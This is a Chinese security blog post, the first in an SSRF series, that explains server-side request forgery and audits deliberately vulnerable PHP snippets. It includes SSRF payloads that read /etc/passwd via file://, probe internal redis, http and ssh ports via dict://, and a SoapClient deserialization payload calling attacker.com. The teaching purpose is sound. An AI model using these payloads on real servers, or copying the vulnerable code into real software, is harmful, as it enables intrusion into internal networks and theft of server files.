<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="SSRF是一个很有趣的漏洞类型，细究起来，它涉及到的知识十分庞杂。关于SSRF的审计、绕过、利用、防御，每一个单拎出来都可以讲上许多。网络上有很多关于SSRF的博客&#x2F;教程，但很多都比较基础，只是简单介绍了这个漏洞。也有很多关于该漏洞的利用，但它们又都过于分散，只讲了其中的某几个点。 为了全面而透彻的讲清楚这个漏洞，我打算多写几篇，针对上述的几个方面，进行一个较为细致的讲解。希望能够较为全面的、透">
<meta property="og:type" content="article">
<meta property="og:title" content="ssrf漏洞总结-起">
<meta property="og:url" content="https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/index.html">
<meta property="og:site_name" content="Vulnner">
<meta property="og:description" content="SSRF是一个很有趣的漏洞类型，细究起来，它涉及到的知识十分庞杂。关于SSRF的审计、绕过、利用、防御，每一个单拎出来都可以讲上许多。网络上有很多关于SSRF的博客&#x2F;教程，但很多都比较基础，只是简单介绍了这个漏洞。也有很多关于该漏洞的利用，但它们又都过于分散，只讲了其中的某几个点。 为了全面而透彻的讲清楚这个漏洞，我打算多写几篇，针对上述的几个方面，进行一个较为细致的讲解。希望能够较为全面的、透">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211107215347831.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211107215258935-1636293188566.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211107215641671.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211107220327347.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211107220426341.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211107221225303.png">
<meta property="og:image" content="https://vulnner.github.io/.io//image-20211107224349209.png">
<meta property="article:published_time" content="2022-01-02T08:07:48.000Z">
<meta property="article:modified_time" content="2022-01-02T08:11:01.653Z">
<meta property="article:author" content="vulnner">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="basic">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://vulnner.github.io/.io//image-20211107215347831.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>ssrf漏洞总结-起</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="Vulnner" type="application/atom+xml">
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">archives</a></li>
         
          <li><a href="/projects_url">Projects</a></li>
         
          <li><a href="/tags/">tags</a></li>
         
          <li><a href="/categories">categories</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E6%89%BF/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2021/12/21/XSS%E5%88%B0%E6%9C%8D%E5%8A%A1%E7%AB%AF%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&text=ssrf漏洞总结-起"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&title=ssrf漏洞总结-起"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&is_video=false&description=ssrf漏洞总结-起"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=ssrf漏洞总结-起&body=Check out this article: https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&title=ssrf漏洞总结-起"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&title=ssrf漏洞总结-起"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&title=ssrf漏洞总结-起"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&title=ssrf漏洞总结-起"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&name=ssrf漏洞总结-起&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&t=ssrf漏洞总结-起"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81SSRF%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">一、SSRF简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E5%88%9D%E6%8E%A2SSRF"><span class="toc-number">2.</span> <span class="toc-text">二、初探SSRF</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#2-1-SSRF%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-number">2.1.</span> <span class="toc-text">2.1 SSRF代码审计</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-2-SSRF%E5%B8%B8%E8%A7%81%E5%88%A9%E7%94%A8"><span class="toc-number">2.2.</span> <span class="toc-text">2.2 SSRF常见利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E6%80%BB%E7%BB%93"><span class="toc-number">3.</span> <span class="toc-text">三、总结</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        ssrf漏洞总结-起
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">Vulnner</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2022-01-02T08:07:48.000Z" itemprop="datePublished">2022-01-02</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/Web/" rel="tag">Web</a>, <a class="tag-link-link" href="/tags/basic/" rel="tag">basic</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <blockquote>
<p>SSRF是一个很有趣的漏洞类型，细究起来，它涉及到的知识十分庞杂。关于SSRF的审计、绕过、利用、防御，每一个单拎出来都可以讲上许多。网络上有很多关于SSRF的博客/教程，但很多都比较基础，只是简单介绍了这个漏洞。也有很多关于该漏洞的利用，但它们又都过于分散，只讲了其中的某几个点。</p>
<p>为了全面而透彻的讲清楚这个漏洞，我打算多写几篇，针对上述的几个方面，进行一个较为细致的讲解。希望能够较为全面的、透彻的总结这个有趣的漏洞。</p>
<p>本篇主要简单介绍SSRF+SSRF的代码审计，可能会涉及到一部分漏洞利用的知识。但还是有点不太好讲，因为防御、绕过和审计是紧密绑定在一起的。</p>
</blockquote>
<p>[toc]</p>
<h2 id="一、SSRF简介"><a href="#一、SSRF简介" class="headerlink" title="一、SSRF简介"></a>一、SSRF简介</h2><p>SSRF（Server-Side Request Forgery：服务器端请求伪造）是一种由攻击者构造形成，并由服务端发起恶意请求的一个安全漏洞。</p>
<p>由于恶意请求由服务端发起，而服务端能够请求到与自身相连而与外网隔绝的内部网络系统，所以一般情况下，SSRF的攻击目标是攻击者无法直接访问的内网系统。</p>
<p>SSRF漏洞的成因则是由于server端提供了从其他服务器获取数据的功能，目标地址用户可控，但服务端未做有效验证。例如，某web应用有一个功能是用户输入URL，服务端从该URL获取网页内容并返回标题给用户。此时攻击者即可将URL改为内网的地址，对内网发起嗅探，为进一步的攻击做准备。</p>
<ol>
<li><p>容易出现SSRF的地方有：</p>
<ul>
<li>在线翻译：提供一个url，然后翻译对应的网页内容</li>
<li>图片加载：用户设定头像处，提供图片链接</li>
<li>图片下载：富文本编辑器中点击下载图片到本地</li>
<li>转码服务：通过URL把对应网页内容调整为适合手机屏幕浏览</li>
<li>链接分享渲染：显示链接的标题和部分内容</li>
<li>网站采集：一些网站会针对输入的url做一些信息采集工作</li>
<li>数据库内置功能：比如mongodb的copyDatabase函数，clickhouse等</li>
<li>…</li>
</ul>
</li>
<li><p>SSRF漏洞的危害：</p>
<ul>
<li>对外网、服务器所在内进行端口扫描，获取一些服务的banner信息等</li>
<li>攻击运行在内网的其他应用，如redis、mysql、docker remote api等</li>
<li>对内网Web应用进行指纹识别，识别企业内部资产信息</li>
<li>攻击内网Web应用，主要通过HTTP GET/POST可实现的攻击</li>
<li>通过file协议读取服务器本地文件等</li>
<li>进行跳板攻击</li>
</ul>
</li>
<li><p>SSRF的分类</p>
<p>从SSRF的成因来看，主要可以分为如下两类：</p>
<ul>
<li><p>直接的socket访问</p>
<p>套接字(socket)，是对网络通信端点的一种抽象，是支持TCP/IP协议网络通信的基本操作单元，一个套接字就是网络上进程通信的一端，提供了应用层进程利用网络协议交换数据的机制。对于直接的socket访问，可通过CRLF和其他注入来进行protocol smuggling。</p>
</li>
<li><p>socket客户端访问</p>
<p>是指各种编程语言等对网络通信的一种实现比如cURL、lwp、java URI、python requests、golang http等。这是我们最常见，最熟悉的一种SSRF。对于socket客户端，则取决于它所支持的协议。我们主要针对web场景，许多发起请求的客户端只支持http(s)协议；但像cURL这种，则支持file、http(s)、gopher、dict等多种协议。</p>
</li>
</ul>
<blockquote>
<p>其实还有一种，Web服务器对CL-TE标准不一致导致的protocol smuggle，效果上来看类似SSRF的漏洞。</p>
</blockquote>
<p>从SSRF的利用(危害)来看，则主要分为如下两类：</p>
<ul>
<li>有回显的SSRF</li>
<li>无回显的SSRF</li>
</ul>
<p>各大漏洞厂商，基本都是根据有无回显来对SSRF进行评级的。</p>
</li>
</ol>
<h2 id="二、初探SSRF"><a href="#二、初探SSRF" class="headerlink" title="二、初探SSRF"></a>二、初探SSRF</h2><h3 id="2-1-SSRF代码审计"><a href="#2-1-SSRF代码审计" class="headerlink" title="2.1 SSRF代码审计"></a>2.1 SSRF代码审计</h3><blockquote>
<p>主要以PHP为例，其他语言是类似的。</p>
</blockquote>
<p>SSRF相关函数主要有：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">file_get_contents();</span><br><span class="line">readfile();</span><br><span class="line">fsockopen();</span><br><span class="line">curl_exec();</span><br><span class="line">fopen();</span><br><span class="line"><span class="comment">// ...</span></span><br></pre></td></tr></table></figure>

<p>上述函数使用不当会造成SSRF漏洞，此外，PHP的原生类<code>SoapClient</code>在反序列化时可能会触发SSRF。</p>
<ul>
<li><p>file_get_contents()</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ssrf.php</span></span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="variable">$url</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>];;</span><br><span class="line">	<span class="keyword">echo</span> file_get_contents(<span class="variable">$url</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>在上述代码中，<code>file_get_contents()</code>将整个文件或url指向的内容读入到一个字符串中，并返回给用户。</p>
<p>可进行远程访问baidu：</p>
</li>
</ul>
<img src="/.io//image-20211107215347831.png" alt="image-20211107215347831" style="zoom:50%;">

<p>​    也可构造类似<code>ssrf.php?url=../../etc/passwd</code>即可读取服务器端任意文件。</p>
<img src="/.io//image-20211107215258935-1636293188566.png" alt="image-20211107215258935" style="zoom:50%;">

<p>​    <code>readfile()</code>和<code>file_get_contens()</code>类似。</p>
<ul>
<li><p>fsockopen()</p>
<p>该函数用于打开一个网络连接或 Unix domain socket连接，初始化一个socket到指定主机，实现对用户指定url对应数据的获取。主要参数如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">fsockopen(</span><br><span class="line">    <span class="keyword">string</span> <span class="variable">$hostname</span>,</span><br><span class="line">    <span class="keyword">int</span> <span class="variable">$port</span> = -<span class="number">1</span>,</span><br><span class="line">    <span class="keyword">int</span> &amp;<span class="variable">$error_code</span> = <span class="literal">null</span>,</span><br><span class="line">    <span class="keyword">string</span> &amp;<span class="variable">$error_message</span> = <span class="literal">null</span>,</span><br><span class="line">    ?<span class="keyword">float</span> <span class="variable">$timeout</span> = <span class="literal">null</span></span><br><span class="line">): resource|<span class="literal">false</span></span><br></pre></td></tr></table></figure>

<p>该函数会通过socket和服务器建立tcp连接，进行原始的数据传输，并且会返回一个句柄，便于之后被其他函数调用(比如<code>fgets()</code>，<code>fwrite()</code>，<code>fgetss()</code>,<code>fclose()</code>,<code>feof()</code>等。</p>
<p>问题代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ssrf1.php</span></span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$host</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>];</span><br><span class="line"><span class="variable">$fp</span> = fsockopen(<span class="variable">$host</span>, <span class="number">80</span>, <span class="variable">$errno</span>, <span class="variable">$errstr</span>, <span class="number">30</span>);</span><br><span class="line"><span class="keyword">if</span> (!<span class="variable">$fp</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$errstr</span> (<span class="subst">$errno</span>)&lt;br /&gt;\n&quot;</span>;</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="variable">$out</span> = <span class="string">&quot;GET / HTTP/1.1\r\n&quot;</span>;</span><br><span class="line">    <span class="variable">$out</span> .= <span class="string">&quot;Host: <span class="subst">$host</span>\r\n&quot;</span>;</span><br><span class="line">    <span class="variable">$out</span> .= <span class="string">&quot;Connection: Close\r\n\r\n&quot;</span>;</span><br><span class="line">    fwrite(<span class="variable">$fp</span>, <span class="variable">$out</span>);</span><br><span class="line">    <span class="keyword">while</span> (!feof(<span class="variable">$fp</span>)) &#123;</span><br><span class="line">        <span class="keyword">echo</span> fgets(<span class="variable">$fp</span>, <span class="number">128</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    fclose(<span class="variable">$fp</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>通过<code>ssrf1.php?url=www.baidu.com</code>即可访问百度首页。</p>
<img src="/.io//image-20211107215641671.png" alt="image-20211107215641671" style="zoom:50%;">

<p>​    但该函数不能读取本地文件，因为是基于socket直接发送了HTTP协议，除非还存在CRLF等问题能改变请求结构，否则就只支持http协议。</p>
</li>
<li><p>curl_exec()</p>
<p><code>curl_init(url)</code>函数初始化一个新的会话，返回一个cURL句柄，供<code>curl_setopt()</code>，<code>curl_exec()</code>和<code>curl_close() </code>函数使用。</p>
<p>测试代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// ssrf2.php</span></span><br><span class="line"><span class="meta">&lt;?php</span> </span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>]))&#123;</span><br><span class="line">  <span class="variable">$link</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>];</span><br><span class="line">  <span class="variable">$curlobj</span> = curl_init(); <span class="comment">// 创建新的 cURL对象</span></span><br><span class="line">  curl_setopt(<span class="variable">$curlobj</span>, CURLOPT_POST, <span class="number">0</span>);</span><br><span class="line">  curl_setopt(<span class="variable">$curlobj</span>,CURLOPT_URL,<span class="variable">$link</span>);</span><br><span class="line">  curl_setopt(<span class="variable">$curlobj</span>, CURLOPT_RETURNTRANSFER, <span class="number">1</span>); <span class="comment">// 设置 URL 和相应的选项</span></span><br><span class="line">  <span class="variable">$result</span>=curl_exec(<span class="variable">$curlobj</span>); <span class="comment">// 抓取 URL 并把它传递给浏览器</span></span><br><span class="line">  curl_close(<span class="variable">$curlobj</span>); <span class="comment">// 关闭 cURL 资源，并且释放系统资源</span></span><br><span class="line"> </span><br><span class="line">  <span class="keyword">echo</span> <span class="variable">$result</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>通过<code>ssrf2.php?url=www.baidu.com</code>即可访问百度。</p>
<p>不过由于cURL还支持dict、file、gopher等协议，我们还可以用这些协议来打。</p>
<p>通过<code>url=dict://localhost:6379/info</code>来查看redis信息。</p>
<img src="/.io//image-20211107220327347.png" alt="image-20211107220327347" style="zoom:50%;">

<p>通过<code>url=file:///etc/passwd</code>来读取服务端文件内容</p>
</li>
</ul>
<img src="/.io//image-20211107220426341.png" alt="image-20211107220426341" style="zoom:50%;">



<ul>
<li><p>SoapClient</p>
<p>SOAP是简单对象访问协议，它是一种轻量级的基于XML的协议，被设计用来在Web上交换结构化的信息。</p>
<p>PHP的SoapClient就是基于SOAP协议，可专门用来访问Web服务的PHP客户端。它是PHP的内置类，当它进行反序列化时，如果触发了其中的<code>__call</code>方法，那它就会发送http(s)请求。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// param1用来知名是否是wsdl模式</span></span><br><span class="line"><span class="comment">// param2是一个数组，若在wsdl模式下，改参数可选；否则必须设置location和uri选项</span></span><br><span class="line"><span class="comment">// location是目标SOAP服务器的URL</span></span><br><span class="line"><span class="comment">// uri是目标SOAP服务器的命名空间</span></span><br><span class="line"><span class="keyword">public</span> SoapClient :: SoapClient(<span class="keyword">mixed</span> <span class="variable">$wsdl</span> [，<span class="keyword">array</span> <span class="variable">$options</span> ])</span><br></pre></td></tr></table></figure>

<p>了解上述两参数的汉以后，就很容易构造出SSRF的payload了。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">new</span> SoapClient(<span class="literal">null</span>,<span class="keyword">array</span>(<span class="string">&#x27;uri&#x27;</span>=&gt;<span class="string">&#x27;http://attacker.com:8000&#x27;</span>, <span class="string">&#x27;location&#x27;</span>=&gt;<span class="string">&#x27;http://attacker.com:8000/test&#x27;</span>));</span><br><span class="line"><span class="variable">$b</span> = serialize(<span class="variable">$a</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$b</span>;</span><br><span class="line"><span class="variable">$c</span> = unserialize(<span class="variable">$b</span>);</span><br><span class="line"><span class="variable">$c</span>-&gt;a();    <span class="comment">// 随便调用对象中不存在的方法, 触发__call方法进行ssrf</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>访问对应网页，触发SSRF。</p>
</li>
</ul>
<img src="/.io//image-20211107221225303.png" alt="image-20211107221225303" style="zoom:50%;">



<h3 id="2-2-SSRF常见利用"><a href="#2-2-SSRF常见利用" class="headerlink" title="2.2 SSRF常见利用"></a>2.2 SSRF常见利用</h3><ol>
<li><p>SSRF常见利用协议：</p>
<ul>
<li><p>file协议</p>
<p>在有回显的情况下，利用 file 协议可以读取任意文件的内容</p>
</li>
<li><p>dict协议</p>
<p>泄露安装软件版本信息，查看端口，操作内网redis服务等</p>
</li>
<li><p>gopher协议</p>
<p>支持发出GET、POST请求。可以先截获get请求包和post请求包，再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议，可用于反弹shell</p>
</li>
<li><p>http(s)协议</p>
</li>
</ul>
</li>
<li><p>常见利用方式：</p>
<ul>
<li><p>读取内网文件</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssrf3.php?file:///etc/passwd</span><br><span class="line">ssrf.php?url=file:///var/www/html/flag.php</span><br></pre></td></tr></table></figure></li>
<li><p>探测内网主机</p>
<p>测试环境如下：</p>
<img src="/.io//image-20211107224349209.png" alt="image-20211107224349209" style="zoom:50%;">

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ssrf3.php?urlhttp://192.168.254.131</span><br><span class="line">ssrf3.php?url=http://192.168.254.132</span><br><span class="line">ssrf3.php?url=http://192.168.254.133</span><br></pre></td></tr></table></figure>

<p>这个可以借助burp intruder，或者自己写脚本来探测。</p>
</li>
<li><p>扫描内网端口</p>
<p>利用dict协议构造如下payload，即可查看内网主机上开放的端口及端口上运行服务的版本信息。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ssrf.php?url=dict://192.168.254.131:6379/info   // redis</span><br><span class="line">ssrf.php?url=dict://192.168.254.132:80/info     // http</span><br><span class="line">ssrf.php?url=dict://192.168.254.133:22/info   // ssh</span><br></pre></td></tr></table></figure></li>
</ul>
</li>
</ol>
<h2 id="三、总结"><a href="#三、总结" class="headerlink" title="三、总结"></a>三、总结</h2><p>上文讲了最基础的SSRF内容，包括漏洞简介、分类，简单的case和最基础的利用，算是一个较为基础的铺垫。</p>
<p>接下来会详细的讲解SSRF的利用，包括一些利用gopher协议打redis进而getshell、打mysql/Memcache利用CRLF注入getshell，利用docker remote api get shell等等。</p>
<p>下下篇应该会讲SSRF的绕过，包括一些简单的@绕过、302跳转、xip.io、dns rebinding、parser和requester实现不一致导致的绕过——这点很有意思，可能会写的比较多。</p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">archives</a></li>
         
          <li><a href="/projects_url">Projects</a></li>
         
          <li><a href="/tags/">tags</a></li>
         
          <li><a href="/categories">categories</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81SSRF%E7%AE%80%E4%BB%8B"><span class="toc-number">1.</span> <span class="toc-text">一、SSRF简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E5%88%9D%E6%8E%A2SSRF"><span class="toc-number">2.</span> <span class="toc-text">二、初探SSRF</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#2-1-SSRF%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-number">2.1.</span> <span class="toc-text">2.1 SSRF代码审计</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-2-SSRF%E5%B8%B8%E8%A7%81%E5%88%A9%E7%94%A8"><span class="toc-number">2.2.</span> <span class="toc-text">2.2 SSRF常见利用</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81%E6%80%BB%E7%BB%93"><span class="toc-number">3.</span> <span class="toc-text">三、总结</span></a></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&text=ssrf漏洞总结-起"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://vulnner.github.io/2022/01/02/ssrf%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93-%E8%B5%B7/&title=ssrf漏洞总结-起"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
